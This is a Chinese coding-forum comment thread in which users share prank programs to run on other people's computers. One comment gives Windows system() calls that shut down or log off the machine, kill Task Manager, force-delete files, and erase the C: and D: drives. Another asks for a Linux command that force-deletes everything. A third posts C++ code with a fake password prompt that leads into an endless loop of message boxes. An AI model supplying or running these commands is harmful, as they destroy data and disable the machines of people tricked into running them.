全部评论 7

  • system("shutdown -s -t 300 -c 你中计了");
    system("shutdown -l");
    system("shutdown -p");
    system("del C:\\a\\*.× -f -s -q");
    	system("taskkill /f /im taskmgr.exe");
        system("erase /f C:");
        system("erase /f D:");
    	system("taskkill /f /im taskmgr.exe");
    

    太邪恶了必须紫菜

    2024-11-29 来自 广东

    1
  • 针对Linux的强制删除所有文件的指令呢?

    2024-12-11 来自 河北

    0
  • 直接关机啊

    2024-12-07 来自 北京

    0
  • 好多报错...

    2024-12-05 来自 北京

    0
  • #include<bits/stdc++.h>
    #include<windows.h> 
    #include<stdlib.h>
    using namespace std;
    void b(){
        while(true){
            MessageBoxA(NULL, "你没中计", "哈哈哈",MB_ICONASTERISK);
        }
    }
    int main(){
        int c=2;
    	
    	MessageBoxA(NULL, "请补药运行", "警告",MB_ICONASTERISK);
    	MessageBoxA(NULL, "快退出", "警告",MB_ICONASTERISK);
    	int a;
    	cout<<"请输入密码"<<endl; 
    	Sleep(200);
    	MessageBoxA(NULL, "密码是5", "提示",MB_ICONASTERISK);
    	cin>>a;
    	if(a==a){
    		cout<<"密码正确"; 
    		Sleep(1000);
    		cout<<"吗?";
    		b();
    	}
    
    	return 0;
    }
    

    2024-11-27 来自 北京

    0
  • 2024-11-26 来自 四川

    0
  • 2024-11-26 来自 四川

    0

热门讨论